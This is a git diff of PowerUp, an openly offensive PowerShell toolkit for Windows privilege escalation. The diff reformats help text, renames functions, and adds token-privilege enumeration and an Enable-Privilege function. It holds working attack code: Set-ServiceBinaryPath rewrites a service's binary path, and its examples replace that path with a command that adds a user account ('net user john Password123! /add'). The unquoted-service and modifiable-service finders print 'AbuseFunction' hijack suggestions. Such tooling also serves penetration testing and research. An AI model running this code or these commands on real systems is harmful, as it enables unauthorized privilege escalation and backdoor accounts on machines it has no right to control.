+SeDebugPrivilege    ...RIVILEGE_ENABLED                2268                3684
+SeSystemEnvironm...            DISABLED                2268                3684
+SeImpersonatePri... ...RIVILEGE_ENABLED                2268                3684
+
+.EXAMPLE
+
+Get-Process notepad | Get-ProcessTokenPrivilege | fl
+
+Privilege   : SeShutdownPrivilege
+Attributes  : DISABLED
+TokenHandle : 2164
+ProcessId   : 2044
+
+Privilege   : SeChangeNotifyPrivilege
+Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
+TokenHandle : 2164
+ProcessId   : 2044
+
+Privilege   : SeUndockPrivilege
+Attributes  : DISABLED
+TokenHandle : 2164
+ProcessId   : 2044
+
+Privilege   : SeIncreaseWorkingSetPrivilege
+Attributes  : DISABLED
+TokenHandle : 2164
+ProcessId   : 2044
+
+Privilege   : SeTimeZonePrivilege
+Attributes  : DISABLED
+TokenHandle : 2164
+ProcessId   : 2044
+
+.OUTPUTS
+
+PowerUp.TokenPrivilege
+
+Outputs a custom object containing the token privilege (name/attributes) for the specified process.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.TokenPrivilege')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ProcessID')]
+        [UInt32]
+        [ValidateNotNullOrEmpty()]
+        $Id,
+
+        [Switch]
+        [Alias('Privileged')]
+        $Special
+    )
+
+    BEGIN {
+        $SpecialPrivileges = @('SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege', 'SeSystemEnvironmentPrivilege', 'SeImpersonatePrivilege', 'SeTcbPrivilege')
+    }
+
+    PROCESS {
+        if ($PSBoundParameters['Id']) {
+            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($ProcessHandle -eq 0) {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            else {
+                $ProcessID = $Id
+            }
+        }
+        else {
+            # open up a pseudo handle to the current process- don't need to worry about closing
+            $ProcessHandle = $Kernel32::GetCurrentProcess()
+            $ProcessID = $PID
+        }
+
+        if ($ProcessHandle) {
+            [IntPtr]$hProcToken = [IntPtr]::Zero
+            $TOKEN_QUERY = 0x0008
+            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($Success) {
+                Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Privileges' | ForEach-Object {
+                    if ($PSBoundParameters['Special']) {
+                        if ($SpecialPrivileges -Contains $_.Privilege) {
+                            $_ | Add-Member Noteproperty 'ProcessId' $ProcessID
+                            $_
+                        }
+                    }
+                    else {
+                        $_ | Add-Member Noteproperty 'ProcessId' $ProcessID
+                        $_
+                    }
                 }
             }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+
+            if ($PSBoundParameters['Id']) {
+                # close the handle if we used OpenProcess()
+                $Null = $Kernel32::CloseHandle($ProcessHandle)
+            }
+        }
+    }
+}
+
+
+function Get-ProcessTokenType {
+<#
+.SYNOPSIS
+
+Returns the token type and impersonation level.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Get-TokenInformation  
+
+.DESCRIPTION
+
+First, if a process ID is passed, then the process is opened using OpenProcess(),
+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
+OpenProcessToken() is then used to get a handle to the specified process token. The token
+is then passed to Get-TokenInformation to query the type and impersonation level for the
+specified token.
+
+.PARAMETER Id
+
+The process ID to enumerate token groups for, otherwise defaults to the current process.
+
+.EXAMPLE
+
+Get-ProcessTokenType
+
+               Type  ImpersonationLevel         TokenHandle           ProcessId
+               ----  ------------------         -----------           ---------
+            Primary      Identification                 872                3684
+
+
+.EXAMPLE
+
+Get-Process notepad | Get-ProcessTokenType | fl
+
+Type               : Primary
+ImpersonationLevel : Identification
+TokenHandle        : 1356
+ProcessId          : 2044
+
+.OUTPUTS
+
+PowerUp.TokenType
+
+Outputs a custom object containing the token type and impersonation level for the specified process.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.TokenType')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ProcessID')]
+        [UInt32]
+        [ValidateNotNullOrEmpty()]
+        $Id
+    )
+
+    PROCESS {
+        if ($PSBoundParameters['Id']) {
+            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($ProcessHandle -eq 0) {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            else {
+                $ProcessID = $Id
+            }
         }
         else {
-            Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            # open up a pseudo handle to the current process- don't need to worry about closing
+            $ProcessHandle = $Kernel32::GetCurrentProcess()
+            $ProcessID = $PID
+        }
+
+        if ($ProcessHandle) {
+            [IntPtr]$hProcToken = [IntPtr]::Zero
+            $TOKEN_QUERY = 0x0008
+            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success) {
+                $TokenType = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Type'
+                $TokenType | ForEach-Object {
+                    $_ | Add-Member Noteproperty 'ProcessId' $ProcessID
+                    $_
+                }
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+
+            if ($PSBoundParameters['Id']) {
+                # close the handle if we used OpenProcess()
+                $Null = $Kernel32::CloseHandle($ProcessHandle)
+            }
         }
-        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenGroupsPtr)
     }
-    else {
-        Write-Warning ([ComponentModel.Win32Exception] $LastError)
+}
+
+
+function Enable-Privilege {
+<#
+.SYNOPSIS
+
+Enables a specific privilege for the current process.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
+
+Uses RtlAdjustPrivilege to enable a specific privilege for the current process.
+Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege
+can be passed on the pipeline.
+
+.EXAMPLE
+
+Get-ProcessTokenPrivilege
+
+                    Privilege                    Attributes                     ProcessId
+                    ---------                    ----------                     ---------
+          SeShutdownPrivilege                      DISABLED                          3620
+      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620
+            SeUndockPrivilege                      DISABLED                          3620
+SeIncreaseWorkingSetPrivilege                      DISABLED                          3620
+          SeTimeZonePrivilege                      DISABLED                          3620
+
+Enable-Privilege SeShutdownPrivilege
+
+Get-ProcessTokenPrivilege
+
+                    Privilege                    Attributes                     ProcessId
+                    ---------                    ----------                     ---------
+          SeShutdownPrivilege          SE_PRIVILEGE_ENABLED                          3620
+      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620
+            SeUndockPrivilege                      DISABLED                          3620
+SeIncreaseWorkingSetPrivilege                      DISABLED                          3620
+          SeTimeZonePrivilege                      DISABLED                          3620
+
+.EXAMPLE
+
+Get-ProcessTokenPrivilege
+
+Privilege                                        Attributes                     ProcessId
+---------                                        ----------                     ---------
+SeShutdownPrivilege                                DISABLED                          2828
+SeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828
+SeUndockPrivilege                                  DISABLED                          2828
+SeIncreaseWorkingSetPrivilege                      DISABLED                          2828
+SeTimeZonePrivilege                                DISABLED                          2828
+
+
+Get-ProcessTokenPrivilege | Enable-Privilege -Verbose
+VERBOSE: Attempting to enable SeShutdownPrivilege
+VERBOSE: Attempting to enable SeChangeNotifyPrivilege
+VERBOSE: Attempting to enable SeUndockPrivilege
+VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege
+VERBOSE: Attempting to enable SeTimeZonePrivilege
+
+Get-ProcessTokenPrivilege
+
+Privilege                                        Attributes                     ProcessId
+---------                                        ----------                     ---------
+SeShutdownPrivilege                    SE_PRIVILEGE_ENABLED                          2828
+SeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828
+SeUndockPrivilege                      SE_PRIVILEGE_ENABLED                          2828
+SeIncreaseWorkingSetPrivilege          SE_PRIVILEGE_ENABLED                          2828
+SeTimeZonePrivilege                    SE_PRIVILEGE_ENABLED                          2828
+
+.LINK
+
+http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html
+#>
+
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Privileges')]
+        [ValidateSet('SeCreateTokenPrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeLockMemoryPrivilege', 'SeIncreaseQuotaPrivilege', 'SeUnsolicitedInputPrivilege', 'SeMachineAccountPrivilege', 'SeTcbPrivilege', 'SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeSystemProfilePrivilege', 'SeSystemtimePrivilege', 'SeProfileSingleProcessPrivilege', 'SeIncreaseBasePriorityPrivilege', 'SeCreatePagefilePrivilege', 'SeCreatePermanentPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeShutdownPrivilege', 'SeDebugPrivilege', 'SeAuditPrivilege', 'SeSystemEnvironmentPrivilege', 'SeChangeNotifyPrivilege', 'SeRemoteShutdownPrivilege', 'SeUndockPrivilege', 'SeSyncAgentPrivilege', 'SeEnableDelegationPrivilege', 'SeManageVolumePrivilege', 'SeImpersonatePrivilege', 'SeCreateGlobalPrivilege', 'SeTrustedCredManAccessPrivilege', 'SeRelabelPrivilege', 'SeIncreaseWorkingSetPrivilege', 'SeTimeZonePrivilege', 'SeCreateSymbolicLinkPrivilege')]
+        [String[]]
+        $Privilege
+    )
+
+    PROCESS {
+        ForEach ($Priv in $Privilege) {
+            [UInt32]$PreviousState = 0
+            Write-Verbose "Attempting to enable $Priv"
+            $Success = $NTDll::RtlAdjustPrivilege($SecurityEntity::$Priv, $True, $False, [ref]$PreviousState)
+            if ($Success -ne 0) {
+                Write-Warning "RtlAdjustPrivilege for $Priv failed: $Success"
+            }
+        }
     }
 }
 
 
 function Add-ServiceDacl {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Adds a Dacl field to a service object returned by Get-Service.
+Adds a Dacl field to a service object returned by Get-Service.
 
-        Author: Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
-        Dacl field to each object. It does this by opening a handle with ReadControl for the
-        service with using the GetServiceHandle Win32 API call and then uses
-        QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
+Dacl field to each object. It does this by opening a handle with ReadControl for the
+service with using the GetServiceHandle Win32 API call and then uses
+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
 
-    .PARAMETER Name
+.PARAMETER Name
 
-        An array of one or more service names to add a service Dacl for. Passable on the pipeline.
+An array of one or more service names to add a service Dacl for. Passable on the pipeline.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-Service | Add-ServiceDacl
+Get-Service | Add-ServiceDacl
 
-        Add Dacls for every service the current user can read.
+Add Dacls for every service the current user can read.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-Service -Name VMTools | Add-ServiceDacl
+Get-Service -Name VMTools | Add-ServiceDacl
 
-        Add the Dacl to the VMTools service object.
+Add the Dacl to the VMTools service object.
 
-    .OUTPUTS
+.OUTPUTS
 
-        ServiceProcess.ServiceController
+ServiceProcess.ServiceController
 
-    .LINK
+.LINK
 
-        https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
+https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [OutputType('ServiceProcess.ServiceController')]
-    param (
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String[]]
         [ValidateNotNullOrEmpty()]
@@ -1067,19 +1661,16 @@ function Add-ServiceDacl {
     BEGIN {
         filter Local:Get-ServiceReadControlHandle {
             [OutputType([IntPtr])]
-            param (
-                [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+            Param(
+                [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
                 [ValidateNotNullOrEmpty()]
                 [ValidateScript({ $_ -as 'ServiceProcess.ServiceController' })]
                 $Service
             )
 
             $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')
-
             $ReadControl = 0x00020000
-
             $RawHandle = $GetServiceHandle.Invoke($Service, @($ReadControl))
-
             $RawHandle
         }
     }
@@ -1117,14 +1708,12 @@ function Add-ServiceDacl {
                         $Dacl = $RawSecurityDescriptor.DiscretionaryAcl | ForEach-Object {
                             Add-Member -InputObject $_ -MemberType NoteProperty -Name AccessRights -Value ($_.AccessMask -as $ServiceAccessRights) -PassThru
                         }
-
                         Add-Member -InputObject $IndividualService -MemberType NoteProperty -Name Dacl -Value $Dacl -PassThru
                     }
                 }
                 else {
                     Write-Error ([ComponentModel.Win32Exception] $LastError)
                 }
-
                 $Null = $Advapi32::CloseServiceHandle($ServiceHandle)
             }
         }
@@ -1132,85 +1721,88 @@ function Add-ServiceDacl {
 }
 
 
-function Set-ServiceBinPath {
+function Set-ServiceBinaryPath {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Sets the binary path for a service to a specified value.
+Sets the binary path for a service to a specified value.
 
-        Author: @harmj0y, Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
 
-    .DESCRIPTION
+.DESCRIPTION
+
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
+service handle to the service with ConfigControl access using the GetServiceHandle
+Win32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
+to the string value specified by binPath, and the handle is closed off.
 
-        Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
-        service handle to the service with ConfigControl access using the GetServiceHandle
-        Win32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
-        to the string value specified by binPath, and the handle is closed off.
+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
+Dacl field to each object. It does this by opening a handle with ReadControl for the
+service with using the GetServiceHandle Win32 API call and then uses
+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
 
-        Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
-        Dacl field to each object. It does this by opening a handle with ReadControl for the
-        service with using the GetServiceHandle Win32 API call and then uses
-        QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
+.PARAMETER Name
 
-    .PARAMETER Name
+An array of one or more service names to set the binary path for. Required.
 
-        An array of one or more service names to set the binary path for. Required.
+.PARAMETER Path
 
-    .PARAMETER binPath
+The new binary path (lpBinaryPathName) to set for the specified service. Required.
 
-        The new binary path (lpBinaryPathName) to set for the specified service. Required.
+.EXAMPLE
 
-    .OUTPUTS
+Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
 
-        $True if configuration succeeds, $False otherwise.
+Sets the binary path for 'VulnSvc' to be a command to add a user.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Set-ServiceBinPath -Name VulnSvc -BinPath 'net user john Password123! /add'
+Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
 
-        Sets the binary path for 'VulnSvc' to be a command to add a user.
+Sets the binary path for 'VulnSvc' to be a command to add a user.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-Service VulnSvc | Set-ServiceBinPath -BinPath 'net user john Password123! /add'
+System.Boolean
 
-        Sets the binary path for 'VulnSvc' to be a command to add a user.
+$True if configuration succeeds, $False otherwise.
 
-    .LINK
+.LINK
 
-        https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx
 #>
 
-    param (
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [OutputType('System.Boolean')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String[]]
         [ValidateNotNullOrEmpty()]
         $Name,
 
-        [Parameter(Position=1, Mandatory=$True)]
+        [Parameter(Position=1, Mandatory = $True)]
+        [Alias('BinaryPath', 'binPath')]
         [String]
         [ValidateNotNullOrEmpty()]
-        $binPath
+        $Path
     )
 
     BEGIN {
         filter Local:Get-ServiceConfigControlHandle {
             [OutputType([IntPtr])]
-            param (
-                [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+            Param(
+                [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
                 [ServiceProcess.ServiceController]
                 [ValidateNotNullOrEmpty()]
                 $TargetService
             )
-
             $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')
-
             $ConfigControl = 0x00000002
-
             $RawHandle = $GetServiceHandle.Invoke($TargetService, @($ConfigControl))
-
             $RawHandle
         }
     }
@@ -1231,11 +1823,10 @@ function Set-ServiceBinPath {
             if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) {
 
                 $SERVICE_NO_CHANGE = [UInt32]::MaxValue
-
-                $Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, "$binPath", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+                $Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, "$Path", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
                 if ($Result -ne 0) {
-                    Write-Verbose "binPath for $IndividualService successfully set to '$binPath'"
+                    Write-Verbose "binPath for $IndividualService successfully set to '$Path'"
                     $True
                 }
                 else {
@@ -1252,69 +1843,71 @@ function Set-ServiceBinPath {
 
 function Test-ServiceDaclPermission {
 <#
-    .SYNOPSIS
-
-        Tests one or more passed services or service names against a given permission set,
-        returning the service objects where the current user have the specified permissions.
+.SYNOPSIS
 
-        Author: @harmj0y, Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
+Tests one or more passed services or service names against a given permission set,
+returning the service objects where the current user have the specified permissions.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: Add-ServiceDacl  
 
-        Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
-        a service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current
-        user are enumerated services where the user has some type of permission are filtered. The
-        services are then filtered against a specified set of permissions, and services where the
-        current user have the specified permissions are returned.
+.DESCRIPTION
 
-    .PARAMETER Name
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
+a service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current
+user are enumerated services where the user has some type of permission are filtered. The
+services are then filtered against a specified set of permissions, and services where the
+current user have the specified permissions are returned.
 
-        An array of one or more service names to test against the specified permission set.
+.PARAMETER Name
 
-    .PARAMETER Permissions
+An array of one or more service names to test against the specified permission set.
 
-        A manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
-        'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
-        'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
-        'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
+.PARAMETER Permissions
 
-    .PARAMETER PermissionSet
+A manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
+'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
+'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
+'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
 
-        A pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'.
+.PARAMETER PermissionSet
 
-    .OUTPUTS
+A pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'.
 
-        ServiceProcess.ServiceController
+.EXAMPLE
 
-    .EXAMPLE
+Get-Service | Test-ServiceDaclPermission
 
-        PS C:\> Get-Service | Test-ServiceDaclPermission
+Return all service objects where the current user can modify the service configuration.
 
-        Return all service objects where the current user can modify the service configuration.
+.EXAMPLE
 
-    .EXAMPLE
+Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
 
-        PS C:\> Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
+Return all service objects that the current user can restart.
 
-        Return all service objects that the current user can restart.
+.EXAMPLE
 
+Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
 
-    .EXAMPLE
+Return the VulnSVC object if the current user has start permissions.
 
-        PS C:\> Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
+.OUTPUTS
 
-        Return the VulnSVC object if the current user has start permissions.
+ServiceProcess.ServiceController
 
-    .LINK
+.LINK
 
-        https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
+https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [OutputType('ServiceProcess.ServiceController')]
-    param (
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
-        [Alias('ServiceName')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ServiceName', 'Service')]
         [String[]]
         [ValidateNotNullOrEmpty()]
         $Name,
@@ -1354,18 +1947,18 @@ function Test-ServiceDaclPermission {
 
         $CheckAllPermissionsInSet = $False
 
-        if($PSBoundParameters['Permissions']) {
+        if ($PSBoundParameters['Permissions']) {
             $TargetPermissions = $Permissions
         }
         else {
-            if($PermissionSet -eq 'ChangeConfig') {
+            if ($PermissionSet -eq 'ChangeConfig') {
                 $TargetPermissions = @('ChangeConfig', 'WriteDac', 'WriteOwner', 'GenericAll', ' GenericWrite', 'AllAccess')
             }
-            elseif($PermissionSet -eq 'Restart') {
+            elseif ($PermissionSet -eq 'Restart') {
                 $TargetPermissions = @('Start', 'Stop')
                 $CheckAllPermissionsInSet = $True # so we check all permissions && style
             }
-            elseif($PermissionSet -eq 'AllAccess') {
+            elseif ($PermissionSet -eq 'AllAccess') {
                 $TargetPermissions = @('GenericAll', 'AllAccess')
             }
         }
@@ -1377,7 +1970,7 @@ function Test-ServiceDaclPermission {
 
             $TargetService = $IndividualService | Add-ServiceDacl
 
-            if($TargetService -and $TargetService.Dacl) {
+            if ($TargetService -and $TargetService.Dacl) {
 
                 # enumerate all group SIDs the current user is a part of
                 $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
@@ -1385,9 +1978,9 @@ function Test-ServiceDaclPermission {
                 $CurrentUserSids += $UserIdentity.User.Value
 
                 ForEach($ServiceDacl in $TargetService.Dacl) {
-                    if($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) {
+                    if ($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) {
 
-                        if($CheckAllPermissionsInSet) {
+                        if ($CheckAllPermissionsInSet) {
                             $AllMatched = $True
                             ForEach($TargetPermission in $TargetPermissions) {
                                 # check permissions && style
@@ -1397,7 +1990,7 @@ function Test-ServiceDaclPermission {
                                     break
                                 }
                             }
-                            if($AllMatched) {
+                            if ($AllMatched) {
                                 $TargetService
                             }
                         }
@@ -1428,50 +2021,63 @@ function Test-ServiceDaclPermission {
 #
 ########################################################
 
-function Get-ServiceUnquoted {
+function Get-UnquotedService {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Returns the name and binary path for services with unquoted paths
-        that also have a space in the name.
+Returns the name and binary path for services with unquoted paths
+that also have a space in the name.
 
-    .EXAMPLE
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission  
 
-        PS C:\> $services = Get-ServiceUnquoted
+.DESCRIPTION
+
+Uses Get-WmiObject to query all win32_service objects and extract out
+the binary pathname for each. Then checks if any binary paths have a space
+and aren't quoted.
 
-        Get a set of potentially exploitable services.
+.EXAMPLE
 
-    .LINK
+Get-UnquotedService
 
-        https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb
+Get a set of potentially exploitable services.
+
+.OUTPUTS
+
+PowerUp.UnquotedService
+
+.LINK
+
+https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb
 #>
-    [CmdletBinding()] param()
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.UnquotedService')]
+    [CmdletBinding()]
+    Param()
 
     # find all paths to service .exe's that have a space in the path and aren't quoted
-    $VulnServices = Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"}
+    $VulnServices = Get-WmiObject -Class win32_service | Where-Object {
+        $_ -and ($Null -ne $_.pathname) -and ($_.pathname.Trim() -ne '') -and (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'")) -and ($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf('.exe') + 4)) -match '.* .*'
+    }
 
     if ($VulnServices) {
         ForEach ($Service in $VulnServices) {
 
-            $ModifiableFiles = $Service.pathname.split(' ') | Get-ModifiablePath
+            $ModifiableFiles = $Service.pathname.Split(' ') | Get-ModifiablePath
 
             $ModifiableFiles | Where-Object {$_ -and $_.ModifiablePath -and ($_.ModifiablePath -ne '')} | Foreach-Object {
-                $ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $Service.name
-
-                if($ServiceRestart) {
-                    $CanRestart = $True
-                }
-                else {
-                    $CanRestart = $False
-                }
-
+                $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $Service.name
                 $Out = New-Object PSObject
                 $Out | Add-Member Noteproperty 'ServiceName' $Service.name
                 $Out | Add-Member Noteproperty 'Path' $Service.pathname
                 $Out | Add-Member Noteproperty 'ModifiablePath' $_
                 $Out | Add-Member Noteproperty 'StartName' $Service.startname
                 $Out | Add-Member Noteproperty 'AbuseFunction' "Write-ServiceBinary -Name '$($Service.name)' -Path <HijackPath>"
-                $Out | Add-Member Noteproperty 'CanRestart' $CanRestart
+                $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)
+                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnquotedService')
                 $Out
             }
         }
@@ -1481,25 +2087,37 @@ function Get-ServiceUnquoted {
 
 function Get-ModifiableServiceFile {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Enumerates all services and returns vulnerable service files.
+Enumerates all services and returns vulnerable service files.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath  
 
-        Enumerates all services by querying the WMI win32_service class. For each service,
-        it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
-        if the current user has rights to modify the service binary itself or any associated
-        arguments. If the associated binary (or any configuration files) can be overwritten,
-        privileges may be able to be escalated.
+.DESCRIPTION
+
+Enumerates all services by querying the WMI win32_service class. For each service,
+it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
